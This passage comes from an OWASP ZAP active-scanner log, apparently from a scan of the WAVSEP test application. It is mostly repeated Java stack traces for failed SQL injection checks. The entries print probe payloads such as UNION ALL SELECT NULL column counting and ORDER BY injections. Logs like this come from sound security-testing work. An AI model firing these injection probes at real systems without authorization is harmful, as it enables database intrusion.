org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681899 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681900 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681901 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681902 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com' ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com' ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681902 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681903 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com' ORDER BY 6730#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com' ORDER BY 6730# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9681904 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681905 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681905 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com' UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com' UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681906 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com' UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com' UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681906 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681907 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [httk://google.com' UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: httk://google.com' UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9681908 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at 